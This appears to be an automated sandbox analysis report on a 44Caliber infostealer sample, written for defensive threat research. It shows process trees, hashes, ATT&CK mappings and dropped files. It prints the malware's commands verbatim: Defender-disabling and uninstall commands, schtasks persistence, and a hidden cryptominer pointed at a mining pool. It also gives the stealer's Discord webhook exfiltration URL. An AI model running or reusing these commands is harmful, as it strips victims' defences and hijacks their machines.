44caliber | 3220df74888873a8f81e0bde3f4743c25f908bf0c97b768863b67d8d78867425

Analysis

max time kernel
0s
max time network
143s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
25-12-2023 16:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2eb2782cc346b73b7180e3e9a220041c.exe
Size

9.3MB
MD5

2eb2782cc346b73b7180e3e9a220041c
SHA1

b5d7dbb4f29e2567f9e4d67a9d64d7034ff5a968
SHA256

3220df74888873a8f81e0bde3f4743c25f908bf0c97b768863b67d8d78867425
SHA512

5124335f1362a836dd6f539052f705e64d080fc640abaf489c2407b819de9e79740ca0d5cc8a32310acecdd5e6a6076d83cb4cb7d013fc82b49b060c2b67dec9
SSDEEP

196608:DzB+082zIZNrOYyPugEl4ZXni32eZ3WU5QR6kj09F1lThXBhc+YX7:DzB+GeN/y2jl4N+2KWVR6u0P1l3Sj

Score

10^/10

44caliber evasion stealer

Malware Config

Extracted

Family

44caliber

https://discord.com/api/webhooks/868513655556292688/7ViWQKXofSCTi8VWoHEcGeQK61RUEBYfnsE72cu6TJnpHYwlgzbrVI5gQn_jpfUMFoS5

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	freegeoip.app
3	freegeoip.app

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1436	sc.exe
312	sc.exe
1096	sc.exe
2812	sc.exe
304	sc.exe
3000	sc.exe
2820	sc.exe
2900	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1984	schtasks.exe
1840	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\2eb2782cc346b73b7180e3e9a220041c.exe
"C:\Users\Admin\AppData\Local\Temp\2eb2782cc346b73b7180e3e9a220041c.exe"
1⤵
PID:1712
- C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe
  "C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe"
  2⤵
  PID:2824
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://java.com/download
    3⤵
    PID:2564
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2564 CREDAT:275457 /prefetch:2
      4⤵
      PID:2772
- C:\Users\Admin\AppData\Local\Temp\Interialoader.exe
  "C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"
  2⤵
  PID:2796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
1⤵
PID:2620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
1⤵
PID:1672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
1⤵
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
1⤵
PID:2096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
1⤵
PID:3052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
1⤵
PID:1684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
1⤵
PID:2484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
1⤵
PID:2304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
1⤵
PID:2684

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
1⤵
PID:2916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  PID:2116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
  2⤵
  PID:1964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -MAPSReporting Disabled
  2⤵
  PID:2344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
  2⤵
  PID:2240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Stop-Service WinDefend
  2⤵
  PID:996
- C:\Windows\system32\sc.exe
  sc stop WinDefend
  2⤵
  - Launches sc.exe
  PID:304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-Service WinDefend -StartupType Disabled
  2⤵
  PID:1692
- C:\Windows\system32\sc.exe
  sc config WinDefend start=disabled
  2⤵
  - Launches sc.exe
  PID:3000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
  2⤵
  PID:1440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
  2⤵
  PID:348
- C:\Windows\system32\Dism.exe
  Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
  2⤵
  PID:2040
- - C:\Users\Admin\AppData\Local\Temp\9A80D814-E6A1-47EA-AD83-BF13793F5BB3\dismhost.exe
    C:\Users\Admin\AppData\Local\Temp\9A80D814-E6A1-47EA-AD83-BF13793F5BB3\dismhost.exe {6A2AFFC1-AB54-4571-AFA2-95CA46E4A0D2}
    3⤵
    PID:1960
- C:\Windows\System32\Wbem\WMIC.exe
  Wmic Product where name="Eset Security" call uninstall
  2⤵
  PID:832

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
1⤵
PID:2928

C:\Users\Admin\AppData\Local\Temp\Interia loader.exe
"C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"
1⤵
PID:2760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
  2⤵
  PID:2660
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
  2⤵
  PID:2808
- - C:\Windows\system32\cmd.exe
    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
    3⤵
    PID:2948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      4⤵
      PID:1272
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      4⤵
      PID:904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      PID:1672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      4⤵
      PID:1076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -DisableArchiveScanning $true
      4⤵
      PID:1936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
      4⤵
      PID:2848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
      4⤵
      PID:784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -DisableScriptScanning $true
      4⤵
      PID:2904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
      4⤵
      PID:2180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -DisableIOAVProtection $true
      4⤵
      PID:2688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
      4⤵
      PID:604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
      4⤵
      PID:2280
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -MAPSReporting Disabled
      4⤵
      PID:2304
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
      4⤵
      PID:2996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Stop-Service WinDefend
      4⤵
      PID:3020
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:2820
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start=disabled
      4⤵
      Launches sc.exe
      PID:2900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-Service WinDefend -StartupType Disabled
      4⤵
      PID:648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
      4⤵
      PID:1248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
      4⤵
      PID:1932
  - - C:\Windows\system32\Dism.exe
      Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
      4⤵
      PID:2400
  - - C:\Windows\System32\Wbem\WMIC.exe
      Wmic Product where name="Eset Security" call uninstall
      4⤵
      PID:408
- C:\Users\Admin\AppData\Roaming\Services.exe
  "C:\Users\Admin\AppData\Roaming\Services.exe"
  2⤵
  PID:1664
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
    3⤵
    PID:2004
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
      4⤵
      Creates scheduled task(s)
      PID:1840
- - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    3⤵
    PID:2876
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6056254 --pass=in --cpu-max-threads-hint=40 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
    3⤵
    PID:1580

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
1⤵
- Creates scheduled task(s)
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
1⤵
PID:1836

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
1⤵
PID:2944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
  2⤵
  PID:2444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  PID:3056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
  2⤵
  PID:3024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableArchiveScanning $true
  2⤵
  PID:268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
  2⤵
  PID:1676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:2996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableScriptScanning $true
  2⤵
  PID:2872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
  2⤵
  PID:1200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:2592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  PID:2920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
  2⤵
  PID:1260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -MAPSReporting Disabled
  2⤵
  PID:2096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
  2⤵
  PID:268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Stop-Service WinDefend
  2⤵
  PID:1796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-Service WinDefend -StartupType Disabled
  2⤵
  PID:1304
- C:\Windows\system32\sc.exe
  sc stop WinDefend
  2⤵
  - Launches sc.exe
  PID:1436
- C:\Windows\system32\sc.exe
  sc config WinDefend start=disabled
  2⤵
  - Launches sc.exe
  PID:312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
  2⤵
  PID:2200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
  2⤵
  PID:2260
- C:\Windows\system32\Dism.exe
  Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
  2⤵
  PID:2904
- - C:\Users\Admin\AppData\Local\Temp\CD76DC5D-C329-49E3-843B-FEEA47FD26C6\dismhost.exe
    C:\Users\Admin\AppData\Local\Temp\CD76DC5D-C329-49E3-843B-FEEA47FD26C6\dismhost.exe {00B2FA3D-A6C7-40B5-B1D9-9B1D2AAE94F1}
    3⤵
    PID:664
- C:\Windows\System32\Wbem\WMIC.exe
  Wmic Product where name="Eset Security" call uninstall
  2⤵
  PID:816

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:1508

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
1⤵
PID:3024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
  2⤵
  PID:2376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  PID:1960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
  2⤵
  PID:2684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
  2⤵
  PID:1964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableArchiveScanning $true
  2⤵
  PID:2692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
  2⤵
  PID:2320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:1836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableScriptScanning $true
  2⤵
  PID:2204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
  2⤵
  PID:2276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:2304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  PID:1716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
  2⤵
  PID:296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -MAPSReporting Disabled
  2⤵
  PID:2596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
  2⤵
  PID:2964
- C:\Windows\system32\sc.exe
  sc config WinDefend start=disabled
  2⤵
  - Launches sc.exe
  PID:1096
- C:\Windows\system32\sc.exe
  sc stop WinDefend
  2⤵
  - Launches sc.exe
  PID:2812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Stop-Service WinDefend
  2⤵
  PID:1812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-Service WinDefend -StartupType Disabled
  2⤵
  PID:964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
  2⤵
  PID:2792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
  2⤵
  PID:3016
- C:\Windows\system32\Dism.exe
  Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
  2⤵
  PID:664
- - C:\Users\Admin\AppData\Local\Temp\4F5AD5BD-AF0E-4CE3-B1D3-304619C55DBF\dismhost.exe
    C:\Users\Admin\AppData\Local\Temp\4F5AD5BD-AF0E-4CE3-B1D3-304619C55DBF\dismhost.exe {CCF0A553-5576-419C-9107-94F9BFA7D68E}
    3⤵
    PID:1044
- C:\Windows\System32\Wbem\WMIC.exe
  Wmic Product where name="Eset Security" call uninstall
  2⤵
  PID:2796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\44\Process.txt

Filesize
473B

MD5
7e715bd896933490555986f19fda6dca

SHA1
f099ff3d1f4ac71ffc846fbf44a997a7ee8f030b

SHA256
4ac7642c8ef0ff0cbff5526c24fb588c7b947c44284bdab48cd57c3b847968ea

SHA512
c796d8e6dca4bc1757f61cc961fce79610f3afc3fd2d59edc34dde1a3b13575f220781782365ce663fa629434205364b765be291dcced721746ff213523e0956

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
659e94478b2b0e9ede07745cc6a912f6

SHA1
d6354c61acd81a3a78ae82840e79501dbc7f3e6b

SHA256
db1dbd6e85d5715110d430572703c51de103f0b775a2655c8951096f92df5ede

SHA512
45ad6904af7bdd37b9949a43ff66a2796f7195a4dab5a885965fea9694cbed76aaa325767e3a4e7b96cc7bf849021f0b888e67bd7f452e7fe4b453bd2fa4e194

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6689b52bf92489316ad1ab54c414105b

SHA1
7f81f42643d69cf9da3d1685de14ccf95d1cda73

SHA256
87aaeaf22f2c6d22c7d1e65bb9b109ab9466cc4689f15f31f8a760e98e1072b7

SHA512
b8eadb01aa58b6e7ba118958337853b466287ac06d28ef64f4b9e6df50dae51c91f1439234d44728ad2c646072fe1746cc1cc61e41e5d2559f13e1df0f4e2c5f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
3ca4a6798652cf19404079b189ce99ff

SHA1
3284cdfbfabddd751e5cccff4eaa3456ae803ab6

SHA256
bcaa54a64c59d04971fdc590adbaea670480c84b5674b8dd3d6c77826e4bdb70

SHA512
50c85c79fc9e647af3d207f10f723d1d4aad9eaf5dcd6f2341e72f98aeb81f40cc3dff72d1872ef65f7af6f7d83bb34d7e4550ac623bacb52502409d57d66105

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7947d9900893316f81b9b49d6c2f3716

SHA1
907860cef19a7d7f6aecc4b1e85550b28a48886b

SHA256
5e1e36a5ce02e197f5892655df8e313ff8e9abe1807cd26807dc253ad83dac38

SHA512
e179b20573abcdd4452907203180b1e023aaaaff3eb3c5665d37e3be615e87137f3e90a110204237aa029940f3eb26102edb269a054aa7cd553ca6d017d46982

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b1531aec4d704ba988db8eacee4ca8e6

SHA1
f5a428bfd707a17103cad6ed5188e0b01be8bda7

SHA256
251114fd829238ea384cce2146cb5c1239d96dddce1660c3279debab0dec81a3

SHA512
efb46eda23c32fe39c57c803aab6d36b905ea40689bc18ca46bc84837733bd39233e0bbf9ea6016854ef5dcce919987d4b3fa60f602469e1a888d9ff35fff637

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5d34d4d337b827b9bb3ef238c638ffa7

SHA1
deac18cf53331c80f058c2bb84ddc8c2d3d77bd0

SHA256
722ded7a6ce8c9a2431e4bf5a46fbcff93d245f5494db6b0ec7ae512e6580506

SHA512
0c195e9e8a16d8740682c9cf5762a38397163bcab7d047cbec5c5c123873d18b18ad5fdb3edb28e8656708f5195de58afcfa857773816463e2d472178d345877

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\KX0WQX8P\www.java[1].xml

Filesize
323B

MD5
1d1b8607d230bf1c36c736c89184d5cf

SHA1
c29ad3cb1f85fabfc359c7e3ccb690441d21bf83

SHA256
e70ca706d4397bcd0e15f5d256f6c0d2c9d6abade313d72227d76a2e7703e041

SHA512
46ac5db8cd5fb12f845767cc778b2a9601891c9ad8303e3c2d442c8083d5b04e229cfbcf2bf9ea12370ffd011deb72c9ab7dbdaa54c99f97d2723fa3bbb83e84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\02cy2i9\imagestore.dat

Filesize
1KB

MD5
8bb419e809ba1f6f585a4314bb9ec799

SHA1
fceb389257bba7a84b32cad05901b540c5838afb

SHA256
b1279fece1798dbd520b0d898bf2567a63d2b5cbc755953562c4ab743050bb61

SHA512
